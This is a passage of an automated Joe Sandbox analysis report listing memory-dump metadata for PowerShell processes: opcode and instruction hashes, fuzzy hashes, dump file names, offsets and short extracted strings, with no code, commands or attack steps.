                                    • Instruction ID: 57a50a0b013b9887bb4291aa816ab78831ea1f4e9b4a4473c41cefe9c13968c7
                                    • Opcode Fuzzy Hash: 61a9658675e60ae376ea0dce2423052c32d03ba5a7d6fc5b31981c0bf710faf5
                                    • Instruction Fuzzy Hash: 00918430608A4E4FDBA8DF28D8557E937D1FF59310F54826EE84DC3291CE74A984CB86
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1158187109.00007FF9C1DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C1DD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_7ff9c1dd0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: dbd42b69a6e3721a1a746ebd17a9da0e0212e4b88453007a0fd720ba0f4b303f
                                    • Instruction ID: 9e16ce42c36bceede665367c721b749bf1ff3e0fb3e2066ae6f20e03da771d47
                                    • Opcode Fuzzy Hash: dbd42b69a6e3721a1a746ebd17a9da0e0212e4b88453007a0fd720ba0f4b303f
                                    • Instruction Fuzzy Hash: 56411732A0CA8A4FFB55EF6868443B97BE1EF59310F4401BED04DC7193DE58B8898B91
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1158187109.00007FF9C1DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C1DD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_7ff9c1dd0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e786a36ef1905e12e82483dcd47a79a07b79dc13ea3fa8fd4c38c3f850c4c4d9
                                    • Instruction ID: 8d4dcfb1b451ab6483c60f1fee786e087a2ca632979f254229ccf3601d7d2064
                                    • Opcode Fuzzy Hash: e786a36ef1905e12e82483dcd47a79a07b79dc13ea3fa8fd4c38c3f850c4c4d9
                                    • Instruction Fuzzy Hash: 3E41E422A0DBC64FF756EB2848593A87BE1FF57214F1800FAD04CDB193DD586C8A8B56
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1158187109.00007FF9C1DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C1DD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_7ff9c1dd0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 38ac0c431d327f70059fabc0baf415dfa81236f86a8c448200060a5642edaf5b
                                    • Instruction ID: ab69e42a8e1c745ab59d5fd498b3183e76b4e0fe9bc778a742bb787afd6c6d31
                                    • Opcode Fuzzy Hash: 38ac0c431d327f70059fabc0baf415dfa81236f86a8c448200060a5642edaf5b
                                    • Instruction Fuzzy Hash: E8310422E0E9870FF3A5EA2C18217B865C1EF95728F6902F9D54ED31C2ED0868884755
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1157689768.00007FF9C1D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C1D00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_7ff9c1d00000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e483d50f72b89f984b41fee47d9d2b6686a921b3869bf5d8b8ac2161caa75cb8
                                    • Instruction ID: 2b4f5d377be4662ae4343c6bf0d93b4ebbe232649621a364e17e22c8c9436b2a
                                    • Opcode Fuzzy Hash: e483d50f72b89f984b41fee47d9d2b6686a921b3869bf5d8b8ac2161caa75cb8
                                    • Instruction Fuzzy Hash: BA31F831A1894D8FDF88EF58D485EAD7BE1FF68310F54416AE40ED3295CA65E881CB81
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1157689768.00007FF9C1D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C1D00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_7ff9c1d00000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f429519f9afdbf8066394e7fd29439cbf37ebca1fedbd5cc039543bb55b815b3
                                    • Instruction ID: 1d8a0f9f8835db4c30bac54f49aee4fdb0032211e04ab87c79d9a9065e133975
                                    • Opcode Fuzzy Hash: f429519f9afdbf8066394e7fd29439cbf37ebca1fedbd5cc039543bb55b815b3
                                    • Instruction Fuzzy Hash: 9B310A3491968E8EEBB4EF25CC0ABF93291FB41315F804139D40EC60A2DAB979C9CF05
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1158187109.00007FF9C1DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C1DD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_7ff9c1dd0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4af82f7d3f3a1762866ab5671bbd79a45cc98132e05e67ed27ddab1ffd56acd5
                                    • Instruction ID: f1d93f3d28428d125e4f6f7d2fb5d47b17ad12c7172a80ef647a98fa69d80b69
                                    • Opcode Fuzzy Hash: 4af82f7d3f3a1762866ab5671bbd79a45cc98132e05e67ed27ddab1ffd56acd5
                                    • Instruction Fuzzy Hash: 7911366190DFCA0FE365EA6808A07753F91DF41320B4901FEE449CB593DC86A88587D4
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1158187109.00007FF9C1DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C1DD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_7ff9c1dd0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2d31b6bf033bc387a349e37b28f7c9d99bf63af0f7d3af75c9c9084f71c5fe39
                                    • Instruction ID: 6b036aa716305bc4d635fd58ae7b29f32f8314831586402a198847427d4a0e5f
                                    • Opcode Fuzzy Hash: 2d31b6bf033bc387a349e37b28f7c9d99bf63af0f7d3af75c9c9084f71c5fe39
                                    • Instruction Fuzzy Hash: 21112B2290DE960FE796EB285494AB97FD0EF1731471806F9C08DCB1D3D908AC85C791
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1158187109.00007FF9C1DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C1DD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_7ff9c1dd0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b151adca1d9aaac7deeada415cbdbdaf8a665aca944c2afb4d3d150121a740ff
                                    • Instruction ID: a22985042bab2acd3e55a68dbb951ea93db73a99c21f6907a94a91fe87e8be08
                                    • Opcode Fuzzy Hash: b151adca1d9aaac7deeada415cbdbdaf8a665aca944c2afb4d3d150121a740ff
                                    • Instruction Fuzzy Hash: 6211083290D7C54FE755EB1898563E8BBE0FF42220F1500FED04CD7083DA686C898B96
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1158187109.00007FF9C1DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C1DD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_7ff9c1dd0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f9859c3ad1e71b3b1d73be97f2eecd73e673895162b2107dacb3b70fe57cc4ae
                                    • Instruction ID: 56b2d104ac21cdc4473f161b7c9a6c1569700e65522f1948a01c5486ff7515cc
                                    • Opcode Fuzzy Hash: f9859c3ad1e71b3b1d73be97f2eecd73e673895162b2107dacb3b70fe57cc4ae
                                    • Instruction Fuzzy Hash: EA11B232A0D7854FF756EB5898563E8BBA0FF42220F1401FED04DD7093DE682D898B96
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1157689768.00007FF9C1D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C1D00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_7ff9c1d00000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                    • Instruction ID: 7793ef2f689b7971be7d26522679c623503bd11b595070f8aa686c38464d29be
                                    • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                    • Instruction Fuzzy Hash: 6E01A73010CB0C4FD744EF0CE451AA6B3E0FB85320F10052DE58AC3665D732E881CB45
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1158187109.00007FF9C1DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C1DD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_7ff9c1dd0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6047613764b091f9ff1681cfee13295d564b71917294e7f4001bc3d653fc8cd7
                                    • Instruction ID: f3612aa25c1c1403058b6aa3310d842ab3a9bbca3f2bdb2d9257edae5c0246f1
                                    • Opcode Fuzzy Hash: 6047613764b091f9ff1681cfee13295d564b71917294e7f4001bc3d653fc8cd7
                                    • Instruction Fuzzy Hash: EDF04912A0DFD50FF762BE681C152B87F90DF1225071901FAD00BD7487DC492C8947D5
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1158187109.00007FF9C1DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C1DD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_7ff9c1dd0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 43626047088eee1a77369bbc5735480eb511bf7345bd952cdd4685d2b63ddef9
                                    • Instruction ID: 8b3e14b9d9ed4fbee64c454ee9880af47e6e4ac579747448bd72f1181c54db23
                                    • Opcode Fuzzy Hash: 43626047088eee1a77369bbc5735480eb511bf7345bd952cdd4685d2b63ddef9
                                    • Instruction Fuzzy Hash: 87F02B37B4CE0D0EB395E72C58052F973D2DFD5131B5582B7D10EC3542ED11E44A4244
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1158187109.00007FF9C1DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C1DD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_7ff9c1dd0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7c0230b69c3efab692879a5de654eea9ca278d0f8181c05e616e6cb1fe862ecf
                                    • Instruction ID: 9dd4f32ae5acbfff330d98b452670880f2a81caefb4c4011d768726b9d4fd083
                                    • Opcode Fuzzy Hash: 7c0230b69c3efab692879a5de654eea9ca278d0f8181c05e616e6cb1fe862ecf
                                    • Instruction Fuzzy Hash: 49E0D833B0DB460DFB59E61C28022F9B391DF82134744487FE14EC2483E916A81A4645

                                    Executed Functions

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$4';r$4';r$4';r$tP;r$tP;r$$;r$$;r$$;r
                                    • API String ID: 0-2737388513
                                    • Opcode ID: 9869541797fd74da9eb47d4a4695e8c0a50c627418ad2a7f37946f3d5290cbf4
                                    • Instruction ID: 0c0b374452a1555ac026b2ff8976dd70c9e24bc97996b75588dcc64b23b1bd87
                                    • Opcode Fuzzy Hash: 9869541797fd74da9eb47d4a4695e8c0a50c627418ad2a7f37946f3d5290cbf4
                                    • Instruction Fuzzy Hash: BAF12931B05344DFD7959B68C804BAABBF5AF96214F2480ABE445CF2D2D736CC46C7A2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$4';r$4';r$4';r$4';r$4';r$x.k$-k
                                    • API String ID: 0-3770723242
                                    • Opcode ID: eba9096b0ade9736afd09be45b5102aa97f17bcb57642677b2cc3f173243e87e
                                    • Instruction ID: 3943f75b4537d2a41c14a2a50fce295fb05bb1720741d19fb3a3f309e061a58e
                                    • Opcode Fuzzy Hash: eba9096b0ade9736afd09be45b5102aa97f17bcb57642677b2cc3f173243e87e
                                    • Instruction Fuzzy Hash: 8E727070E00354DFDB64CB58C940BAEB7B6AF88304F14C5A9D909AB795CB32DC82CB91
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2080979458.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_b50000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 8N$n$H?r$h]$n$h]$n$h]$n$$;r$$;r$I$n
                                    • API String ID: 0-3640140049
                                    • Opcode ID: cf7d92bfa798e625e91d2a3470030071f9bcc82f5b3fddc5dd64be175f130f5b
                                    • Instruction ID: b51cbe11512d37f389cb7d69be6f94296415b4549e684c7ccd1dac4567529605
                                    • Opcode Fuzzy Hash: cf7d92bfa798e625e91d2a3470030071f9bcc82f5b3fddc5dd64be175f130f5b
                                    • Instruction Fuzzy Hash: 64223F34B006189FDB29EB64C954BAEB7F6AF89301F1445E9D809AB351CB35DE85CF80
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$4';r$4';r$4';r$4';r$4';r$x.k$-k
                                    • API String ID: 0-3770723242
                                    • Opcode ID: f728566e75473376cf4eefb69e13b18cc6a79bc19c39ce4c0fb5c266ebd7c4fc
                                    • Instruction ID: 71f4a208d1f33e3e656298ea66ee9504cdb41030b358f4d299ac179268c2093d
                                    • Opcode Fuzzy Hash: f728566e75473376cf4eefb69e13b18cc6a79bc19c39ce4c0fb5c266ebd7c4fc
                                    • Instruction Fuzzy Hash: 89D16E30B003049FDB54DBA8C955BAFB7A6AF88704F24C569D9016F395CB76EC42CB92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$4';r$x.k$x.k$-k
                                    • API String ID: 0-400449958
                                    • Opcode ID: 0f415d2ee6ff0dceed81735d471cd8fbd4e7a7c38d5ec7a867d3c37651d27737
                                    • Instruction ID: 855c9ecb095a49e1927001866101816f0bff177b2e6de586c65fdbd22137e755
                                    • Opcode Fuzzy Hash: 0f415d2ee6ff0dceed81735d471cd8fbd4e7a7c38d5ec7a867d3c37651d27737
                                    • Instruction Fuzzy Hash: 1CF19130B003549FDB64DB58C941BAEB7A2AB88304F10C4A9E9096F395DB76DD82CF91
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$4';r$4';r$x.k$-k
                                    • API String ID: 0-1757251866
                                    • Opcode ID: 7196058879b4f65521aaa3da5efd02fe5cf0aee467466a544cdf6a6ba755a4c3
                                    • Instruction ID: 154eedaabdf6f5a4509351496c37ef2f5f86e1248ef6ef7ad864e37460e5bcc4
                                    • Opcode Fuzzy Hash: 7196058879b4f65521aaa3da5efd02fe5cf0aee467466a544cdf6a6ba755a4c3
                                    • Instruction Fuzzy Hash: 9AB15C34A00304DFDB54CB98C945BAFBBB6AB88304F24D559E9056F395CB76EC42CB92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$4';r$4';r$4';r
                                    • API String ID: 0-229571521
                                    • Opcode ID: 3dc380682f36229bdd4d315c12fa61d84c008158eb4610fbc6cac9e876c07626
                                    • Instruction ID: 867094c14874a189c4f878e7df83028c8401acba0ae1d1aaed13ffb1fb7053c9
                                    • Opcode Fuzzy Hash: 3dc380682f36229bdd4d315c12fa61d84c008158eb4610fbc6cac9e876c07626
                                    • Instruction Fuzzy Hash: ADF129B5F043049FD7949A6984117AB7BA6AFC5218F25807AD506CB391FB32CC43C7E2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $;r$$;r$$;r
                                    • API String ID: 0-2047961761
                                    • Opcode ID: 1816091d7258e7de68b26d4e82d11a1e8b4b538565059685ed2bb932bbc48df6
                                    • Instruction ID: d760581bdca354aea11ec9a9aa1857d6207bc5d0399669f1586b8325910749a1
                                    • Opcode Fuzzy Hash: 1816091d7258e7de68b26d4e82d11a1e8b4b538565059685ed2bb932bbc48df6
                                    • Instruction Fuzzy Hash: 02412A36F00315DFDBA45E6989007FAF7A5AFC4214B24852AD805EB385EA32D902C7E1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $;r$$;r$$;r
                                    • API String ID: 0-2047961761
                                    • Opcode ID: 0c1ed2ce03b47c5d29866d91c87e075659588b2aba42eb262411551674f2b360
                                    • Instruction ID: 64122f72153c124d7a7b1be3022c6514e33be9b7a1389052f539140fbfd1ccf7
                                    • Opcode Fuzzy Hash: 0c1ed2ce03b47c5d29866d91c87e075659588b2aba42eb262411551674f2b360
                                    • Instruction Fuzzy Hash: E821AB35B003059FEBB8597A4D00B77B29A5FC0618F24D42AA706CB381DD37CA47C360
                                    Strings
                                    • 4';r, xrefs: 06ED2CC6
                                    • 4';r, xrefs: 06ED2CD2
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$4';r
                                    • API String ID: 0-2119891490
                                    • Opcode ID: a1e4d80e75d15d91d6ad1e9319f86e94efb63e9d552282a18ae94d96d90e1bc8
                                    • Instruction ID: 944ec2e8d624cc3e2013f005c1333c27b9f82d57326ce04d5672e3e98f068778
                                    • Opcode Fuzzy Hash: a1e4d80e75d15d91d6ad1e9319f86e94efb63e9d552282a18ae94d96d90e1bc8
                                    • Instruction Fuzzy Hash: 21F15B74B003049FD754CF98C555BAAB7B2AB88318F24D069EA059F395CB72ED43CB92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$4';r
                                    • API String ID: 0-2119891490
                                    • Opcode ID: 827dc869cb29bd94cab2fcc03fff0aaecd4565bdebe81270963fb9e2b86fc3cb
                                    • Instruction ID: e42e0945ba7e80b6d3c85f060b702b81535f2ddefea9c401d7805a7d5118dd66
                                    • Opcode Fuzzy Hash: 827dc869cb29bd94cab2fcc03fff0aaecd4565bdebe81270963fb9e2b86fc3cb
                                    • Instruction Fuzzy Hash: 5441E339F00305DFEBA49E69D5057FAB7E6AF85214B24907AD406CB251EB32C943C7A1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: tP;r$tP;r
                                    • API String ID: 0-3438757700
                                    • Opcode ID: ec24cdbba82965faf4bb700478346ec24aa629df6624927c1e3b243fbe962292
                                    • Instruction ID: 25c61d86f18e5967aa2db455fcbcfc629605892008babd4c17b03c5ea7f643a8
                                    • Opcode Fuzzy Hash: ec24cdbba82965faf4bb700478346ec24aa629df6624927c1e3b243fbe962292
                                    • Instruction Fuzzy Hash: 6D310536F003159FDB609B69D940BEAF7A6EFC5218F28807AE5168B641DB32DC03C791
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2080979458.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_b50000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: h]$n$I$n
                                    • API String ID: 0-1388317859
                                    • Opcode ID: 6aeb4dcf91592472e1167eb09de97f174825b5dda8b480c2fcb21d3a84535d62
                                    • Instruction ID: d5359322e19b21fa53ecab13f573ce21e0db5ede2b7525ecd25b28a3fd737ff5
                                    • Opcode Fuzzy Hash: 6aeb4dcf91592472e1167eb09de97f174825b5dda8b480c2fcb21d3a84535d62
                                    • Instruction Fuzzy Hash: AD313834A002188FCB2AEB64C8447EEB7F6BF89305F1044E9D919AB351CB359E85CF90
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $;r$$;r
                                    • API String ID: 0-214785769
                                    • Opcode ID: ca4cf272fada725777d4370fed43268cd97599c0b79e6e7e275d11150610e5c0
                                    • Instruction ID: d413fc5095de4ad62e216ade162da7912be6311dde7bd8238aa4b532b23265de
                                    • Opcode Fuzzy Hash: ca4cf272fada725777d4370fed43268cd97599c0b79e6e7e275d11150610e5c0
                                    • Instruction Fuzzy Hash: 14215735A083846FEBB509364D00BB33F664FD2608F289197EB44DB292D57B8A4AC371
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $;r$$;r
                                    • API String ID: 0-214785769
                                    • Opcode ID: a0c16c12b80726d78fc7558eab50b8b4391f79eef2ed9bc39a125d73407837f5
                                    • Instruction ID: f1b6e92d9a404bf1050b6302a775779fd7614a68acf735103a9930dba20b99ec
                                    • Opcode Fuzzy Hash: a0c16c12b80726d78fc7558eab50b8b4391f79eef2ed9bc39a125d73407837f5
                                    • Instruction Fuzzy Hash: AA21793AE08351DFCFA19F6889002E5BFB4AE492107154197DC48EB3CAF3359906C7E1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: x.k
                                    • API String ID: 0-3814145804
                                    • Opcode ID: 567435ba297503250edb48c344d2e93f43bfe98c45e9249a4eef9f2710a174c6
                                    • Instruction ID: 19a4cdcd6df62bef1235606a6eeaa3aa8dee6cd236094fde2ad23b9d58771c34
                                    • Opcode Fuzzy Hash: 567435ba297503250edb48c344d2e93f43bfe98c45e9249a4eef9f2710a174c6
                                    • Instruction Fuzzy Hash: 93B1A130B003049FEB54DBA4C945BAEB7E3AF89304F248169E9056F795CB32EC46CB91
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: x.k
                                    • API String ID: 0-3814145804
                                    • Opcode ID: ed112fe43fe4777f5e636760a8fe30788787ce03a918c3cca1d0f261a411287b
                                    • Instruction ID: 835d22884646fdb9215411e8dc65b89f48e8e467c753c62877118e29091138c5
                                    • Opcode Fuzzy Hash: ed112fe43fe4777f5e636760a8fe30788787ce03a918c3cca1d0f261a411287b
                                    • Instruction Fuzzy Hash: 06918E30A00304DFDB54DB98C945BAEB7B3AF89304F249169E9056F795CB72EC46CB91
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r
                                    • API String ID: 0-3786809255
                                    • Opcode ID: 935cdae04394a1f33762ba8836b6619c1cce316f483910bca194aa74068fc2e3
                                    • Instruction ID: 2b2ebe14ed2d3534002c3efdd4e0fb669fdbc38f7bb033723b0c0a4958fedc56
                                    • Opcode Fuzzy Hash: 935cdae04394a1f33762ba8836b6619c1cce316f483910bca194aa74068fc2e3
                                    • Instruction Fuzzy Hash: 99310838E04341EFEBA0CF25C541BFABBB1EF46254B58906AD405CB1A2D735C843C7A2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: x.k
                                    • API String ID: 0-3814145804
                                    • Opcode ID: d1a2911028941016375561d5d75fbd3536f442456acb366f0804b70bb810edba
                                    • Instruction ID: cd8b33e76ade0abdefb08402847a326267c156b12f06594b1408f0015d872ad2
                                    • Opcode Fuzzy Hash: d1a2911028941016375561d5d75fbd3536f442456acb366f0804b70bb810edba
                                    • Instruction Fuzzy Hash: B7316D30B00204AFE754ABA4CD55FAF76A7AB85744F24C524E902AF391DF76DC428B92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: tP;r
                                    • API String ID: 0-723269967
                                    • Opcode ID: 169e290320ee56e95e5fff42a4d437da93a13eae78e17fbecf088510f69db8e0
                                    • Instruction ID: 7bc9b54f7f609a8b213f58934fdff2a73a2d92a56d8645175d7ad2600810eaed
                                    • Opcode Fuzzy Hash: 169e290320ee56e95e5fff42a4d437da93a13eae78e17fbecf088510f69db8e0
                                    • Instruction Fuzzy Hash: C811D635F003019FDBA08F55C941FEAFBA6EFC5318F288169E9189B691C732D942C791
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e7384f59ece0631947177b2bde647db6949f0884dcd33ae74a10a5eff105ea2c
                                    • Instruction ID: 38c4ddd21a2477dfa4c482b7c94ca53cb0b7953c7491100c32b208b563083023
                                    • Opcode Fuzzy Hash: e7384f59ece0631947177b2bde647db6949f0884dcd33ae74a10a5eff105ea2c
                                    • Instruction Fuzzy Hash: 09224E74B013049FE744CB98C555FAAB7B2AF89309F24C069E9059F395DB72EC42CB92
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
